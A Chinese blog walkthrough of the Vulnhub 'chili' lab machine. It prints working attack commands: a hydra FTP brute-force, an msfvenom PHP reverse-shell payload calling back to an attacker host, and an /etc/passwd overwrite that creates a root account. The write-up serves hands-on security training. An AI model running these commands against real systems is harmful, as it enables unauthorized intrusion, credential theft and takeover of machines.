点击蓝字,关注我们
靶机:chili
难度:简单
下载:https://www.vulnhub.com/entry/chili-1,558/
扫描当前网段,确定目标靶机IP
只开放了80、21端口,直接访问,扫目录一梭子
网页 目录空空如也,这种情况一般就要看页面源码
查看源码发现一些关键词
直接爬取关键词生成字典,准备爆破FTP服务
Cewl http://192.168.12.128 > user.txt
字典生成好了,直接开始爆破FTP
hydra -L /root/user.txt -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.12.128
账号:chili
密码:a1b2c3d4
先登入FTP,成功登入FTP
查看网站目录,看看文件和权限
.nano文件存在高权限,直接上MSF的PHP马
Msf生成php马
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.12.130 LPORT=3388 -f raw > shell.php
ftp上传到.nano设置777权限
Msf开启监控,连接php马
上传提权脚本并给777权限
脚本:https://github.com/luke-goddard/enumy
执行脚本
可写passwd,构造test成高权用户
/usr/bin/perl -le 'print crypt("test","test")'
echo "test:teH0wLIpW0gyQ:0:0:root:/root:/bin/bash" > /etc/passwd
拿到flag
往期推荐:
本文始发于微信公众号(信安小屋):Vulnhub篇chili
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论